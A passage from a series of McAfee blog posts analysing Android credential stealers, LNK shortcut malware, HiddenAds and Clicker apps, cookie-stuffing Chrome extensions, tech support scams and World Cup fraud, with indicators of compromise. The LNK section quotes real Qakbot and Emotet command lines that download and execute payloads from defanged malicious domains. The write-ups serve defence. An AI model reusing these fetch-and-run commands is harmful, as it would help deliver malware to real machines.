The languages of most communication channels were English, Portuguese, and Hindi. Especially, Hindi was the most common, and most videos had more than 100 views. In the case of a famous YouTuber’s video, they have recorded more than 2,400 views. In addition, our test account had 400 followers in one day. It means that at least 400 users have sent credentials to the malware author. 

Conclusion 

As we mentioned in the opening remarks, many Instagram users want to increase their followers and likes. Unfortunately, attackers are also aware of the desires of these users and use that to attack them. 

Therefore, users who want to install these apps should consider that their credentials may be leaked. In addition, there may be secondary attacks such as credential stuffing (=use of a stolen username and password pairs on another website). Aside from the above cases, there are many unanalyzed similar apps on the Internet. You shouldn’t use suspicious apps to get followers and likes. 

McAfee Mobile Security detects this threat as Android/InstaStealer and protects you from this malware. For more information, visit McAfee Mobile Security. 

Indicators of Compromise 

SHA256: 

• e292fe54dc15091723aba17abd9b73f647c2d24bba2a671160f02bdd8698ade2 

• 6f032baa1a6f002fe0d6cf9cecdf7723884c635046efe829bfdf6780472d3907 

Domains: 

• https[://]insfreefollower.com 

The post Instagram credentials Stealers: Free Followers or Free Likes appeared first on McAfee Blog.

Authored by Lakshya Mathur

An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. These files can be created manually using the standard right-click create shortcut option or sometimes they are created automatically while running an application. There are many tools also available to build LNK files, also many people have built “lnkbombs” tools specifically for malicious purposes.

During the second quarter of 2022, McAfee Labs has seen a rise in malware being delivered using LNK files. Attackers are exploiting the ease of LNK, and are using it to deliver malware like Emotet, Qakbot, IcedID, Bazarloaders, etc.

In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.

Below is a screenshot of how these shortcut files look to a normal user.

LNK THREAT ANALYSIS & CAMPAIGNS

With Microsoft disabling office macros by default malware actors are now enhancing their lure techniques including exploiting LNK files to achieve their goals.

Threat actors are using email spam and malicious URLs to deliver LNK files to victims. These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files.

We will go through three recent malware campaigns Emotet, IcedID, and Qakbot to see how dangerous these files can be.

 

EMOTET

Infection-Chain

Threat Analysis

In Figure 4 we can see the lure message and attached malicious LNK file.

The user is infected by manually accessing the attached LNK file. To dig a little deeper, we see the properties of the LNK file:

As seen in Figure 5 the target part reveals that LNK invokes the Windows Command Processor (cmd.exe). The target path as seen in the properties is only visible to 255 characters. However, command-line arguments can be up to 4096, so malicious actors can that this advantage and pass on long arguments as they will be not visible in the properties.

In our case the argument is /v:on /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

Once the findstr.exe utility receives the mentioned string, the rest of the content of the LNK file is saved in a .VBS file under the %temp% folder with the random name YIScZcZKeP.vbs

The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.

The downloaded DLL is then finally executed using the REGSVR32.EXE utility which is similar behavior to the excel(.xls) based version of the emotet.

ICEDID

Infection-Chain

Threat Analysis

This attack is a perfect example of how attackers chain LNK, PowerShell, and MSHTA utilities target their victims.

Here, PowerShell LNK has a highly obfuscated parameter which can be seen in Figure 8 target part of the LNK properties

The parameter is exceptionally long and is not fully visible in the target part. The whole obfuscated argument is decrypted at run-time and then executes MSHTA with argument hxxps://hectorcalle[.]com/093789.hta.

The downloaded HTA file invokes another PowerShell that has a similar obfuscated parameter, but this connects to Uri hxxps://hectorcalle[.]com/listbul.exe

The Uri downloads the IcedID installer 64-bit EXE payload under the %HOME% folder.

QAKBOT

Infection-Chain

Threat Analysis

This attack will show us how attackers can directly hardcode malicious URLs to run along with utilities like PowerShell and download main threat payloads.

In Figure 10 the full target part argument is “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr”

When this PowerShell LNK is invoked, it connects to hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png using the Invoke-WebRequest command and the download file is saved under the %temp% folder with the name test.dll

This is the main Qakbot DLL payload which is then executed using the rundll32 utility.

CONCLUSION

As we saw in the above three threat campaigns, it is understood that attackers abuse the windows shortcut LNK files and made them to be extremely dangerous to the common users. LNK combined with PowerShell, CMD, MSHTA, etc., can do severe damage to the victim’s machine. Malicious LNKs are generally seen to be using PowerShell and CMD by which they can connect to malicious URLs to download malicious payloads.

We covered just three of the threat families here, but these files have been seen using other windows utilities to deliver diverse types of malicious payloads. These types of attacks are still evolving, so every user must give a thorough check while using LNK shortcut files. Consumers must keep their Operating system and Anti-Virus up to date. They should beware of phishing mail and clicking on malicious links and attachments.

IOC (Indicators of Compromise)

Type	SHA-256	Scanner
Emotet LNK	02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71	WSS	LNK/Emotet-FSE
IcedID LNK	24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9	WSS	LNK/Agent-FTA Suspicious ZIP!lnk
Qakbot LNK	b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172	WSS	LNK/Agent-TSR
URLs (Uniform Resource Locator)	hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/ hxxp://filmmogzivota[.]rs/SpryAssets/gDR/ hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/ hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/ hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1/ hxxps://hectorcalle[.]com/093789.hta hxxps://hectorcalle[.]com/listbul.exe hxxps://green-a-thon[.]com/LosZkUvr/B.png	WebAdvisor	All URLs Blocked

 

The post Rise of LNK (Shortcut files) Malware appeared first on McAfee Blog.

Authored by Dexter Shin

McAfee’s Mobile Research Team has identified new malware on the Google Play Store. Most of them are disguising themselves as cleaner apps that delete junk files or help optimize their batteries for device management. However, this malware hides and continuously show advertisements to victims. In addition, they run malicious services automatically upon installation without executing the app.

HiddenAds functions and promotion

They exist on Google Play even though they have malicious activities, so the victim can search for the following apps to optimize their device.

Users may generally think installing the app without executing it is safe. But you may have to change your mind because of this malware. When you install this malware on your device, it is executed without interaction and executes a malicious service.

In addition, they try to hide themselves to prevent users from noticing and deleting apps. Change their icon to a Google Play icon that users are familiar with and change its name to ‘Google Play’ or ‘Setting.’

Automatically executed services constantly display advertisements to victims in a variety of ways.

These services also induce users to run an app when they install, uninstall, or update apps on their devices.

To promote these apps to new users, the malware authors created advertising pages on Facebook. Because it is the link to Google Play distributed through legitimate social media, users will download it without a doubt.

How it works

This malware uses the Contact Provider. The Contact Provider is the source of data you see in the device’s contacts application, and you can also access its data in your own application and transfer data between the device and online services. For this, Google provides ContactsContract class. ContactsContract is the contract between the Contacts Provider and applications. In ContactsContract, there is a class called Directory. A Directory represents a contacts corpus and is implemented as a Content Provider with its unique authority. So, developers can use it if they want to implement a custom directory. The Contact Provider can recognize that the app is using a custom directory by checking special metadata in the manifest file.

The important thing is the Contact Provider automatically interrogates newly installed or replaced packages. Thus, installing a package containing special metadata will always call the Contact Provider automatically.

The first activity defined in the application tag in the manifest file is executed as soon as you install it just by declaring the metadata. The first activity of this malware will create a permanent malicious service for displaying advertisements.

In addition, the service process will generate immediately even if it is forced to kill.

Next, they change their icons and names using the <activity-alias> tag to hide.

Users infected worldwide

It is confirmed that users have already installed these apps from 100K to 1M+. Considering that the malware works when it is installed, the installed number is reflected as the victim’s number. According to McAfee telemetry data, this malware and its variants affect a wide range of countries, including South Korea, Japan, and Brazil:

Conclusion

This malware is auto-starting malware, so as soon as the users download it from Google Play, they are infected immediately. And it is still constantly developing variants that are published by different developer accounts. Therefore, it is not easy for users to notice this type of malware.

We already disclosed this threat to Google and all reported applications were removed from the Play Store. Also, McAfee Mobile Security detects this threat as Android/HiddenAds and protects you from this type of malware. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com

Indicators of Compromise

Applications:

App Name	Package Name	Downloads
Junk Cleaner	cn.junk.clean.plp	1M+
EasyCleaner	com.easy.clean.ipz	100K+
Power Doctor	com.power.doctor.mnb	500K+
Super Clean	com.super.clean.zaz	500K+
Full Clean -Clean Cache	org.stemp.fll.clean	1M+
Fingertip Cleaner	com.fingertip.clean.cvb	500K+
Quick Cleaner	org.qck.cle.oyo	1M+
Keep Clean	org.clean.sys.lunch	1M+
Windy Clean	in.phone.clean.www	500K+
Carpet Clean	og.crp.cln.zda	100K+
Cool Clean	syn.clean.cool.zbc	500K+
Strong Clean	in.memory.sys.clean	500K+
Meteor Clean	org.ssl.wind.clean	100K+

 

SHA256:

• 4b9a5de6f8d919a6c534bc8595826b9948e555b12bc0e12bbcf0099069e7df90
• 4d8472f0f60d433ffa8e90cc42f642dcb6509166cfff94472a3c1d7dcc814227
• 5ca2004cfd2b3080ac4958185323573a391dafa75f77246a00f7d0f3b42a4ca3
• 5f54177a293f9678797e831e76fd0336b0c3a4154dd0b2175f46c5a6f5782e24
• 7a502695e1cab885aee1a452cd29ce67bb1a92b37eed53d4f2f77de0ab93df9b
• 64d8bd033b4fc7e4f7fd747b2e35bce83527aa5d6396aab49c37f1ac238af4bd
• 97bd1c98ddf5b59a765ba662d72e933baab0a3310c4cdbc50791a9fe9881c775
• 268a98f359f2d56497be63a31b172bfbdc599316fb7dec086a937765af42176f
• 690d658acb9022765e1cf034306a1547847ca4adc0d48ac8a9bbdf1e6351c0f7
• 75259246f2b9f2d5b1da9e35cab254f71d82169809e5793ee9c0523f6fc19e4b
• a5cbead4c9868f83dd9b4dc49ca6baedffc841772e081a4334efc005d3a87314
• c75f99732d4e4a3ec8c19674e99d14722d8909c82830cd5ad399ce6695856666

Domains:

• http[://]hw.sdk.functionads.com:8100

The post New HiddenAds malware affects 1M+ users and hides on the Google Play Store appeared first on McAfee Blog.

Authored by Oliver Devane

Technical Support Scams have been targeting computer users for many years. Their goal is to make victims believe they have issues needing to be fixed, and then charge exorbitant fees, which unfortunately some victims pay. This blog post covers a number of example actions, that scammers will go through when they are performing their scams. Our goal is to educate consumers on the signs to look out for, and what to do if they believe they are being scammed.

Advertising – The Lure

For a tech support scammer to reach their victims, they need to first find them (or be found by them). One technique we see includes scammers creating Twitter or other social media accounts that post messages claiming to be from the official technical support site. For example, a Twitter account will post a tweet with the hashtags #McAfee and #McAfeeLogin to drive traffic to the tweet and make victims believe the links are legitimate and safe to click.

Scammers behind tech support scams can create very convincing websites which mimic the official ones.

Some fraudulent websites use the McAfee logo or other company logos to try trick individuals. They often invite clicking on a ‘LOGIN’ or ‘ACTIVATE’ link with a similar color scheme to official sites to appear legitimate.

These sites may then ask the victim to enter their real username, password, and phone number. Upon entering these details, websites will usually show an error message to make the victim believe there is an issue with their account.

 

The error message will usually contain a link that upon clicking will load a chat box where the scammers will initiate a conversation with the victim. At this point, the scammers will have the phone number and email address associated with the victim. They will use this to contact them and make them believe they are an official technical support employee.

Gaining Access

The scammer’s next objective is often to gain access to the victim’s computer. They do this so that they can trick the victim into believing there is an issue with their computer and that they need their support services to fix it.

The scammers will do this by either asking the victim to enter a URL that will result in the download of a remote access tool or by providing them with a link in the chat window if they are still speaking to them on the fake support website.

A remote access tool will enable the scammer to take complete control of the victim’s machine. With this, they will be able to remove or install software, access personal data such as documents and cryptocurrency wallets as well as dump passwords from the web browsers so they can then access all the victim’s accounts.

It is vital to not provide remote access to your computer to unknown and unverified individuals, as there could be a big risk to your personal data. Some examples of remote access tools that have legitimate uses but are often used to perpetrate fraud are:

• TeamViewer
• LogMeIn
• AnyDesk
• Aweray (Awesun)

Activity once the connection is established

If the scammers are given access to the victim’s machine, they will often make use of the command filename cmd.exe to perform some visual activity on the computer screen which is done to attempt to trick the individual into believing that some malicious activity is occurring on their computer or network. Most people will be unaware of the filename cmd.exe and the actions being used,and thus will be none the wiser to the scammer’s actions.

Here are some examples we have seen scammers use:

Title

Changing the title of cmd.exe to ‘network scanner’ or ‘file scanner’ to make the victim believe they are running a security tool on their machine.

Directory enumeration

Scammers will make use of standard functions within the cmd.exe file, to make their victims believe they are performing lots of activity. One of these functions is ‘dir’ which will  display  all the files for a specific directory. For example, if you have a folder called ‘school work’ and have 2 word documents in there, a ‘dir’ query of that folder will appear like this:

What the scammers will do is make use of ‘dir’ and the title function to make you believe they are scanning your machine. Here is an example of running ‘dir’ on the all the files on a machine with the cmd.exe title set to ‘File Scanner’:

Tree

A similar function to ‘dir’ called ‘tree’ may also be used. The ‘tree’ function will display directory paths and will generate lots of events on the screen:

Tech Support Phone Number

Some scammers will also add their phone number to the taskbar of the victim’s machine. They do this by creating a new folder with the phone number as the name and adding it as a toolbar. This is shown in the image below

Software Installation

Scammers may install other software on the victim’s machine or make them believe that they have installed additional software which they will then be charged for.

For example, some scammers may add programs to the desktop of victims which have no purpose, but the scammers insist they are legitimate security tools such as firewalls or network scanners.

Some example filenames are:

• Firewall security.exe
• Network firewall.exe
• Network security.exe
• Email security.exe
• Banking security.exe

Payment

The scammers will usually perform some activity on your machine before asking for payment. This is done to build confidence in their work and make you believe they have done some activity and therefore deserve some sort of payment. Do not be fooled by scammers who have not performed any useful activity.  As detailed in the previous sections, be careful not to fall victim to fake social media accounts or websites.

Signs to look out for

This section contains a few signs to look out for which may indicate that you are interacting with a scammer.

Rude/Short

Some scammers will become rude and very short with you if you start questioning what they are doing. They may say that you are not technical and do not understand what is occurring. This would not be the behavior of a legitimate technical support operative.

Leave the computer on

Scammers will encourage you to leave the machine and remote connection on even if you need to go out and leave it unattended. Do not under any circumstances do this as they would then be free to do any activity they wish on your machine and network.

Created files being detected

Some files added to your machine by the scammer may be detected by the AV security software. They may act like this is an error and the file is innocent. If you have initiated a remote connection and the controller creates a file on your machine which is detected by the security software, we recommend ceasing the interaction as detailed below.

What to do

The following steps should be performed if you believe you are being scammed as part of a tech support scam.

Disconnect the machine from the internet

If the machine is connected via a network cable, the easiest way is to unplug it. If the machine is connected via Wi-Fi, there may be a physical switch that can be used to disconnect it. If there is no physical switch, turn off Wi-Fi through the settings or the computer. It  can be powered down by pressing the power button.

Hang up

Hang up the phone (or end the chat) and do not answer any more calls from that number. The scammer will try to make you believe that the call is legitimate and ask you to reconnect the remote-control software.

Remove the remote-control software

If the scammer was controlling your machine, the remote-control software will need to be removed. If the computer was powered down, it can be powered back up, but if a popup is shown asking for permission to allow remote access, do not grant it.

The remote software can usually be removed by using the control panel and add/remove programs. To do this, press the Windows key and then perform a search for ‘remove’ and click on ‘Add or remove programs’.

Sort the programs by install date as shown below and then remove the remote software by clicking on the ‘Uninstall’ button.  Keep in mind that the software installed on your computer may appear by a different name, but if you look at what was installed on the same day as the scammer initiated the remote control session, you should be able to identify it.

Check the Antivirus Software for any exclusions

Some scammers may add exclusions for the files they create on your computer so that they are not detected by the security software. We recommend checking the exclusions and if any are present which were not added by yourself to remove them.

A guide for McAfee customers is available here

Update Antivirus Software and perform a full scan

After removing any software which was installed, we recommend updating your security software and performing a full scan. This will identify any malicious files created by the scammer such as password stealers and keyloggers.

Change passwords

After performing a full scan, we recommend changing all of your passwords as the scammer may have gathered your credentials while they had access to your computer. It is recommended to do this after performing a full scan as the scammers may have placed a password stealer on the computer and any new passwords you enter may also be stolen.

Conclusion

This blog post contains a number of examples that scammers may use to trick consumers into believing that they may have issues with their devices. If you are experiencing issues with your computer and want to speak to official McAfee support, please reach out via the official channel which is https://service.mcafee.com/.

The McAfee support pages can also be accessed directly via the McAfee Total Protection screen as shown below:

McAfee customers utilizing web protection (including McAfee Web Advisor) are protected from known malicious sites.

The post Technical Support Scams – What to look out for appeared first on McAfee Blog.

Authored by Oliver Devane and Vallabh Chole 

September 9, 2022 Update: Since the original publication of this blog on August 29, 2022, the Flipshope browser extension was updated in the Chrome Store on September 6, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.

September 30, 2022 Update: Since the original publication of this blog on August 29, 2022, the AutoBuy browser extension was updated in the Chrome Store on September 17, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.

 

A few months ago, we blogged about malicious extensions redirecting users to phishing sites and inserting affiliate IDs into cookies of eCommerce sites. Since that time, we have investigated several other malicious extensions and discovered 5 extensions with a total install base of over 1,400,000

The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website. The latter borrows several phrases from another popular extension called GoFullPage 

Apart from offering the intended functionality, the extensions also track the user’s browsing activity.  Every website visited is sent to servers owned by the extension creator. They do this so that they can insert code into eCommerce websites being visited. This action modifies the cookies on the site so that the extension authors receive affiliate payment for any items purchased.    

The users of the extensions are unaware of this functionality and the privacy risk of every site being visited being sent to the servers of the extension authors.  

The 5 extensions are  

Name	Extension ID	Users
Netflix Party	mmnbenehknklpbendgmgngeaignppnbe	800,000
Netflix Party 2	flijfnhifgdcbhglkneplegafminjnhn	300,000
FlipShope – Price Tracker Extension	adikhbfjdbjkhelbdnffogkobkekkkej	80,000
Full Page Screenshot Capture – Screenshotting	pojgkmkfincpdkdgjepkmdekcahmckjp	200,000
AutoBuy Flash Sales	gbnahglfafmhaehbdmjedfhdmimjcbed	20,000

 

Technical Analysis 

This section contains the technical analysis of the malicious chrome extension ‘mmnbenehknklpbendgmgngeaignppnbe’. All 5 extensions perform similar behavior.   

Manifest.json 

 

The manifest.json sets the background page as bg.html. This HTML file loads b0.js and this is responsible for sending the URL being visited and injecting code into the eCommerce sites. 

B0.js 

The b0.js script contains many functions. This blog will focus on the functions which are responsible for sending the visited URLs to the server and processing the response.  

Chrome extensions work by subscribing to events which they then use as triggers to perform a certain activity. The extensions analyzed subscribe to events coming from chrome.tabs.onUpdated. chrome.tabs.onUpdated will trigger when a user navigates to a new URL within a tab.

Once this event triggers, the extension will set a variable called curl with the URL of the tab by using the tab.url variable. It creates several other variables which are then sent to d.langhort.com. The POST data is in the following format:

Variable	Description
Ref	Base64 encoded referral URL
County	The county of the device
City	The city of the device
Zip	The zip code of the device
Apisend	A random ID generated for the user.
Name	Base64 encoded URL being visited
ext_name	The name of the chrome extensions

 

The random ID is created by selecting 8 random characters in a character set. The code is shown below: 

The country, city, and zip are gathered using ip-api.com. The code is shown below: 

Upon receiving the URL, langhort.com will check if it matches a list of websites that it has an affiliate ID for, and If it does, it will respond to the query. An example of this is shown below: 

The data returned is in JSON format. The response is checked using the function below and will invoke further functions depending on what the response contains. 

Two of the functions are detailed below: 

Result[‘c’] – passf_url 

If the result is ‘c’ such as the one in this blog, the extension will query the returned URL. It will then check the response and if the status is 200 or 404, it will check if the query responded with a URL. If it did, it would insert the URL that is received from the server as an Iframe on the website being visited.  

Result[‘e’] setCookie 

If the result is ‘e’, the extension would insert the result as a cookie. We were unable to find a response of ‘e’ during our analysis, but this would enable the authors to add any cookie to any website as the extensions had the correct ‘cookie’ permissions.  

Behavioral flow 

The images below show the step-by-step flow of events while navigating to the BestBuy website.  

1. The user navigates to bestbuy.com and the extension posts this URL in a Base64 format to d.langhort.com/chrome/TrackData/ 
2. Langhort.com responds with “c” and the URL. The “c” means the extension will invoke the function passf_url() 
3. passf_url() will perform a request against the URL 
4. the URL queried in step 3 is redirected using a 301 response to bestbuy.com with an affiliate ID associated with the Extension owners 
5. The extension will insert the URL as an Iframe in the bestbuy.com site being visited by the user 
6. Shows the Cookie being set for the Affiliate ID associated with the Extension owners. They will now receive a commission for any purchases made on bestbuy.com  

Here is a video of the events 

Time delay to avoid automated analysis 

We discovered an interesting trick in a few of the extensions that would prevent malicious activity from being identified in automated analysis environments. They contained a time check before they would perform any malicious activity. This was done by checking if the current date is > 15 days from the time of installation.  

Conclusion  

This blog highlights the risk of installing extensions, even those that have a large install base as they can still contain malicious code.  

McAfee advises its customers to be cautious when installing Chrome extensions and pay attention to the permissions that they are requesting.   

The permissions will be shown by Chrome before the installation of the extension. Customers should take extra steps to verify the authenticity if the extension is requesting permissions that enable it to run on every website you visit such as the one detailed in this blog  

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.   

The Malicious code within the extension is detected as JTI/Suspect. Please perform a ‘Full’ scan via the product.  

Type	Value	Product	Detected
Chrome Extension	Netflix Party – mmnbenehknklpbendgmgngeaignppnbe	Total Protection and LiveSafe	JTI/Suspect
Chrome Extension	FlipShope – Price Tracker Extension – Version 3.0.7.0 – adikhbfjdbjkhelbdnffogkobkekkkej	Total Protection and LiveSafe	JTI/Suspect
Chrome Extension	Full Page Screenshot Capture  pojgkmkfincpdkdgjepkmdekcahmckjp	Total Protection and LiveSafe	JTI/Suspect
Chrome Extension	Netflix Party 2 – flijfnhifgdcbhglkneplegafminjnhn	Total Protection and LiveSafe	JTI/Suspect
Chrome Extension	AutoBuy Flash Sales  gbnahglfafmhaehbdmjedfhdmimjcbed	Total Protection and LiveSafe	JTI/Suspect
URL	www.netflixparty1.com	McAfee WebAdvisor	Blocked
URL	netflixpartyplus.com	McAfee WebAdvisor	Blocked
URL	goscreenshotting.com	McAfee WebAdvisor	Blocked
URL	langhort.com	McAfee WebAdvisor	Blocked
URL	Unscart.in	McAfee WebAdvisor	Blocked
URL	autobuyapp.com	McAfee WebAdvisor	Blocked

The post Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users appeared first on McAfee Blog.

Authored by SangRyol Ryu

Cybercriminals are always after illegal advertising revenue. As we have previously reported, we have seen many mobile malwares masquerading as a useful tool or utility, and automatically crawling ads in the background. Recently the McAfee Mobile Research Team has identified new Clicker malware that sneaked into Google Play. In total 16 applications that were previously on Google Play have been confirmed to have the malicious payload with an assumed 20 million installations.

McAfee security researchers notified Google and all of the identified apps are no longer available on Google Play. Users are also protected by Google Play Protect, which blocks these apps on Android. McAfee Mobile Security products detect this threat as Android/Clicker and protect you from malware. For more information, to get fully protected, visit McAfee Mobile Security.

How it works

The malicious code was found on useful utility applications like Flashlight (Torch), QR readers, Camara, Unit converters, and Task managers:

Once the application is opened, it downloads its remote configuration by executing an HTTP request. After the configuration is downloaded, it registers the FCM (Firebase Cloud Messaging) listener to receive push messages. At first glance, it seems like well-made android software. However, it is hiding ad fraud features behind, armed with remote configuration and FCM techniques.

Attribute name	Known meaning of the value
FCMDelay	Initial start hours after first installation
adButton	Visivility of a button of Advertisement
adMob	AdMob unit ID
adMobBanner	AdMob unit ID
casOn	Whether CAS library works or not
facebookAd	FaceBook Ad ID
fbAdRatio	Ratio of FB AD
googleAdRatio	Ratio of AdMob
is	Decide BootService to run or not
urlOpen	to open popup or not when starts PowerService
popUrl	URL for PowerService
popUpDelay	Delay time for PowerService
liveUrl	URL for livecheck service
pbeKey	Key for making unique string
playButtonList	URL for other service
reviewPopupDialog	‘y’ it shows review dialog
tickDelay	Delay time for TickService
tickEnable	Value of TickService enabled
tickRandomMax	Value of TickService random delay
tickRandomMin	Value of TickService random delay
tickType	Set the type of TickService
updateNotiVersion	Value for showing update activity

 

The FCM message has various types of information and that includes which function to call and its parameters. The picture below shows some of FCM message history:

When an FCM message receives and meets some condition, the latent function starts working. Mainly, it is visiting websites which are delivered by FCM message and browsing them successively in the background while mimicking user’s behavior. This may cause heavy network traffic and consume power without user awareness during the time it generates profit for the threat actor behind this malware. In the picture below there is an example of the network traffic generated to get the information required to generate fake clicks and the websites visited without user’s consent or interaction:

Malicious components: CAS and LivePosting

So far, we have identified two pieces of code related to this threat. One is “com.click.cas” library which focuses on the automated clicking functionality while “com.liveposting” library works as an agent and runs hidden adware services:

Depending on the version of the applications, some have both libraries working together while other applications only have “com.liveposting” library. The malware is using installation time, random delay and user presence to avoid the users from noticing these malicious acts. The malicious behavior won’t start if the installation time is within an hour and during the time the user is using the device, probably to stay under the radar and avoid being detected right away:

Conclusion

Clicker malware targets illicit advertising revenue and can disrupt the mobile advertising ecosystem. Malicious behavior is cleverly hidden from detection. Malicious actions such as retrieving crawl URL information via FCM messages start in the background after a certain period of time and are not visible to the user.

McAfee Mobile Security detects and removes malicious applications like this one that may run in the background without user’s knowledge. Also, we recommend having a security software installed and activated so you will be notified of any mobile threats present on your device in a timely manner. Once you remove this and other malicious applications, you can expect an extended battery time and you will notice reduced mobile data usage while ensuring that your sensitive and personal data is protected from this and other types of threats.

IoCs (Indicators of Compromise)

liveposting[.]net

sideup[.]co[.]kr

msideup[.]co[.]kr

post-blog[.]com

pangclick[.]com

modooalba[.]net

 

SHA256	Package name	Name	Downloaded
a84d51b9d7ae675c38e260b293498db071b1dfb08400b4f65ae51bcda94b253e	com.hantor.CozyCamera	High-Speed Camera	10,000,000+
00c0164d787db2ad6ff4eeebbc0752fcd773e7bf016ea74886da3eeceaefcf76	com.james.SmartTaskManager	Smart Task Manager	5,000,000+
b675404c7e835febe7c6c703b238fb23d67e9bd0df1af0d6d2ff5ddf35923fb3	kr.caramel.flash_plus	Flashlight+	1,000,000+
65794d45aa5c486029593a2d12580746582b47f0725f2f002f0f9c4fd1faf92c	com.smh.memocalendar	달력메모장	1,000,000+
82723816760f762b18179f3c500c70f210bbad712b0a6dfbfba8d0d77753db8d	com.joysoft.wordBook	K-Dictionary	1,000,000+
b252f742b8b7ba2fa7a7aa78206271747bcf046817a553e82bd999dc580beabb	com.kmshack.BusanBus	BusanBus	1,000,000+
a2447364d1338b73a6272ba8028e2524a8f54897ad5495521e4fab9c0fd4df6d	com.candlencom.candleprotest	Flashlight+	500,000+
a3f484c7aad0c49e50f52d24d3456298e01cd51595c693e0545a7c6c42e460a6	com.movinapp.quicknote	Quick Note	500,000+
a8a744c6aa9443bd5e00f81a504efad3b76841bbb33c40933c2d72423d5da19c	com.smartwho.SmartCurrencyConverter	Currency Converter	500,000+
809752e24aa08f74fce52368c05b082fe2198a291b4c765669b2266105a33c94	com.joysoft.barcode	Joycode	100,000+
262ad45c077902d603d88d3f6a44fced9905df501e529adc8f57a1358b454040	com.joysoft.ezdica	EzDica	100,000+
1caf0f6ca01dd36ba44c9e53879238cb46ebb525cb91f7e6c34275c4490b86d7	com.schedulezero.instapp	Instagram Profile Downloader	100,000+
78351c605cfd02e1e5066834755d5a57505ce69ca7d5a1995db5f7d5e47c9da1	com.meek.tingboard	Ez Notes	100,000+
4dd39479dd98124fd126d5abac9d0a751bd942b541b4df40cb70088c3f3d49f8	com.candlencom.flashlite	손전등	1,000+
309db11c2977988a1961f8a8dbfc892cf668d7a4c2b52d45d77862adbb1fd3eb	com.doubleline.calcul	계산기	100+
bf1d8ce2deda2e598ee808ded71c3b804704ab6262ab8e2f2e20e6c89c1b3143	com.dev.imagevault	Flashlight+	100+

 

The post New Malicious Clicker found in apps installed by 20M+ users appeared first on McAfee Blog.

Authored by: Christy Crimmins and Oliver Devane

Football (or Soccer as we call it in the U.S.) is the most popular sport in the world, with over 3.5 billion fans across the globe. On November 20th, the men’s World Cup kicks off (pun intended) in Qatar. This event, a tournament played by 32 national teams every four years, determines the sport’s world champion. It will also be one of the most-watched sporting events of at least the last four years (since the previous World Cup). 

An event with this level of popularity and interest also attracts fraudsters and cyber criminals looking to capitalize on fans’ excitement. Here’s how to spot these scams and stay penalty-free during this year’s tournament. 

New Cup, who’s this? 

Phishing is a tool that cybercriminals have used for years now. Most of us are familiar with the telltale signs—misspelled words, poor grammar, and a sender email whose email address makes no sense or whose phone number is unknown. But excitement and anticipation can cloud our judgment. What football fan wouldn’t be tempted to win a free trip to see their home team participate in the ultimate tournament? Cybercriminals are betting that this excitement will cloud fans’ judgment, leading them to click on nefarious links that ultimately download malware or steal personal information. 

It’s important to realize that these messages can come via a variety of channels, including email, text messages, (also known as smishing) and other messaging channels like WhatsApp and Telegram. No matter what the source is, it’s essential to remain vigilant and pause to think before clicking links or giving out personal or banking information.  

For more information on phishing and how to spot a phisher, see McAfee’s “What is Phishing?” blog. 

Real money for fake tickets 

According to ActionFraud, the UK’s national reporting center for fraud and cybercrime, thousands of people were victims of ticket fraud in 2019—and that’s just in the UK. Ticket fraud is when someone advertises tickets for sale, usually through a website or message board, collects the payment and then disappears, without the buyer ever receiving the ticket.  

 

The World Cup is a prime (and lucrative) target for this type of scam, with fans willing to pay thousands of dollars to see their teams compete. Chances are most people have their tickets firmly in hand (or digital wallet) by now, but if you’re planning to try a last-minute trip, beware of this scam and make sure that you’re using a legitimate, reputable ticket broker. To be perfectly safe, stick with well-known ticket brokers and those who offer consumer protection. Also beware of sites that don’t accept debit or credit cards and only accept payment in the form of bitcoin or wire transfers such as the one on the fake ticket site below:  

The red box on the right image shows that the ticket site accepts payment via Bitcoin.  

Other red flags to look out for are websites that ask you to contact them to make payment and the only contact information is via WhatsApp. 

Streaming the matches 

Let’s be realistic—most of us are going to have to settle for watching the World Cup from the comfort of our own home, or the pub down the street. If you’re watching the tournament online, be sure that you’re using a legitimate streaming service. A quick Google of “FIFA World Cup 2022 Official Streaming” along with your country should get you the information you need to safely watch the event through official channels. The FIFA site itself is also a good source of information.  

Illegal streaming sites usually contain deceptive ads and malware which can cause harm to your device.  

Don’t get taken to the bank 

In countries or regions where sports betting is legal, the 2022 World Cup is expected to drive an increase in activity. There’s no shortage of things to bet on, from a simple win/loss to the exact minute a goal will be scored by a particular player. Everything is subject to wager.   

As with our previous examples, this increase in legitimate gambling brings with it an increase in deceptive activity. Online betting scams often start when users are directed to or search for gambling site and end up on a fraudulent one. After placing their bets and winning, users realize that while they may have “won” money, they are unable to withdraw it and are even sometimes asked to deposit even more money to make winnings available, and even then, they still won’t be. By the end of this process, the bettor has lost all their initial money (and then some, potentially) as well as any personal information they shared on the site.  

Like other scams, users should be wary of sites that look hastily put together or are riddled with errors. Your best bet (yes, again, pun intended) is to look for an established online service that is approved by your government or region’s gaming commission. Finally, reading the fine print on incentives or bonuses is always a good idea. If something sounds too good to be true, it’s best to double-check. 

